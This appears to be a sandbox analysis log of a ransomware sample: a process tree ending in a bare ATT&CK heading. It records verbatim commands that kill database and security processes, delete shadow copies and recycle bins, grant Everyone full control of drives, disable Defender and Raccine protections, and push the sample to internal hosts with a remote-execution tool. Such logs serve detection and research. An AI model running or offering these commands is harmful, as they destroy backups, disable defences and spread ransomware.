C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:4404

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:4692

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:5100

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:4132

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:2008

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
PID:732

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
PID:4988

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
PID:4132

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
PID:2196

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
PID:2188

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
PID:4752

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
PID:3004

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4992

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
PID:4660

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
PID:4916

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
PID:4864

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
PID:4484

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
PID:4908

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
PID:4652

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
PID:4500

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
PID:4772

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
PID:5100

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
PID:4548

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
PID:3540

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
PID:3876

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
PID:4208

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
PID:2088

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
PID:3632

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
PID:2288

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
PID:1444

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
PID:1252

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
PID:1820

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
PID:4764

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
PID:5056

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
PID:3956

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:1472

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
PID:4244

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
PID:3212

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
PID:5000

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
PID:500

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
PID:4532

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
PID:1564

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
PID:4576

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
PID:4948

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
PID:4248

C:\Windows\SYSTEM32\arp.exe
"arp" -a
2⤵
PID:4260

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
PID:4820

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
PID:4476

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
PID:2560

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
PID:4776

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
PID:3928

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
PID:4892

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ragent.exe /f
2⤵
- Kills process with taskkill
PID:4104

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM rmngr.exe /f
2⤵
- Kills process with taskkill
PID:2936

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM rphost.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM 1cv8.exe /f
2⤵
- Kills process with taskkill
PID:4976

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sql.exe /f
2⤵
- Kills process with taskkill
PID:4308

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqld.exe /f
2⤵
- Kills process with taskkill
PID:3092

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysql.exe /f
2⤵
PID:4276

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /f
2⤵
- Kills process with taskkill
PID:2192

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM oracle.exe /f
2⤵
PID:4684

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM vmwp.exe /f
2⤵
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
PID:4768

C:\Windows\SYSTEM32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1516

C:\Windows\SYSTEM32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:5084

C:\Windows\SYSTEM32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4796

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCF8A.bat
2⤵
PID:5004

C:\Windows\system32\mountvol.exe
mountvol
3⤵
PID:4708

C:\Windows\system32\find.exe
find "}\"
3⤵
PID:4612

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
3⤵
PID:4984

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:3784

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
3⤵
PID:4956

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4464

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
3⤵
PID:4344

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4540

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:5020

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3432

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:5044

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:4380

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:1236

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:4320

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:2212

C:\Windows\SYSTEM32\arp.exe
"arp" -a
2⤵
PID:2328

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.38 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:3816

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.10 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4840

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.36 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.11 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:2560

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.39 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4532

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.18 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4312

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:732

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.24 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.30 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.21 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.27 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3876

C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
"C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
2⤵
PID:4232

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1764

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4272

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:5652

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4896

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4100

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:5700

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4904

C:\Windows\SYSTEM32\icacls.exe
"icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\PAExec-5084-RJMQBVDN.exe
C:\Windows\PAExec-5084-RJMQBVDN.exe -service
1⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
2⤵
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
3⤵
PID:1128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
3⤵
PID:4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
PID:4236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
3⤵
PID:4356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
3⤵
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
3⤵
PID:2180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
3⤵
PID:1584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
3⤵
PID:4844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
3⤵
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
PID:4468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
3⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
3⤵
PID:4484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
3⤵
PID:4172

C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
3⤵
PID:3524

C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
3⤵
- Modifies registry key
PID:2184

C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
3⤵
PID:4708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4696

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3⤵
PID:3532

C:\Windows\system32\sc.exe
"sc.exe" config Dnscache start= auto
3⤵
PID:4632

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
3⤵
PID:5028

C:\Windows\system32\sc.exe
"sc.exe" config FDResPub start= auto
3⤵
PID:4448

C:\Windows\system32\sc.exe
"sc.exe" config SSDPSRV start= auto
3⤵
PID:4620

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
3⤵
PID:4252

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
PID:1536

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4132

C:\Windows\system32\sc.exe
"sc.exe" config upnphost start= auto
3⤵
PID:4888

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
3⤵
PID:5144

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
3⤵
- Kills process with taskkill
PID:5228

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
PID:5220

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
PID:5212

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
PID:5412

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
PID:5504

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
3⤵
- Kills process with taskkill
PID:5540

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
3⤵
PID:5548

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
3⤵
PID:5788

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
3⤵
PID:5984

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
3⤵
- Kills process with taskkill
PID:6016

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
3⤵
- Kills process with taskkill
PID:6024

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
3⤵
PID:6116

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
3⤵
- Kills process with taskkill
PID:1228

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
3⤵
- Kills process with taskkill
PID:3808

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
3⤵
- Kills process with taskkill
PID:5168

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
3⤵
PID:4888

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
3⤵
- Kills process with taskkill
PID:4632

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
3⤵
PID:5424

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
3⤵
- Kills process with taskkill
PID:5268

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
3⤵
PID:5296

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
3⤵
PID:4340

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
3⤵
PID:5668

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
3⤵
PID:5512

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
3⤵
- Kills process with taskkill
PID:5728

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
PID:5580

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
3⤵
- Kills process with taskkill
PID:6128

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
3⤵
- Kills process with taskkill
PID:5864

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
3⤵
PID:2736

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
3⤵
PID:2720

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
3⤵
PID:4292

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
3⤵
PID:6088

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2008

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
3⤵
PID:6076

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
3⤵
- Kills process with taskkill
PID:6068

C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
3⤵
- Kills process with taskkill
PID:4912

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
PID:5504

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
3⤵
- Kills process with taskkill
PID:5024

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
3⤵
- Kills process with taskkill
PID:5696

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
3⤵
- Kills process with taskkill
PID:5012

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
3⤵
PID:5104

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
3⤵
- Kills process with taskkill
PID:4520

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5064

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
3⤵
PID:1768

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
3⤵
- Kills process with taskkill
PID:4672

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
3⤵
- Kills process with taskkill
PID:5308

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
3⤵
PID:5488

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
3⤵
- Kills process with taskkill
PID:4764

C:\Windows\system32\arp.exe
"arp" -a
3⤵
PID:4356

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
3⤵
- Kills process with taskkill
PID:5028

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
3⤵
PID:3672

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
3⤵
PID:5368

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqld.exe /f
3⤵
PID:4360

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /f
3⤵
PID:508

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sql.exe /f
3⤵
PID:4984

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /f
3⤵
PID:4700

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysql.exe /f
3⤵
- Kills process with taskkill
PID:2176

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM vmwp.exe /f
3⤵
- Kills process with taskkill
PID:4188

C:\Windows\system32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:2828

C:\Windows\system32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:4976

C:\Windows\system32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:4844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
3⤵
PID:3280

C:\Windows\system32\cmd.exe
"cmd.exe" /C C:\Windows\TEMP\tmp6B97.bat
3⤵
PID:5516

C:\Windows\system32\mountvol.exe
mountvol
4⤵
PID:800

C:\Windows\system32\find.exe
find "}\"
4⤵
PID:1820

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
4⤵
PID:2436

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
4⤵
- Runs ping.exe
PID:4956

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
4⤵
PID:5856

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
4⤵
- Runs ping.exe
PID:5552

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
4⤵
PID:5764

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
4⤵
- Runs ping.exe
PID:5220

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

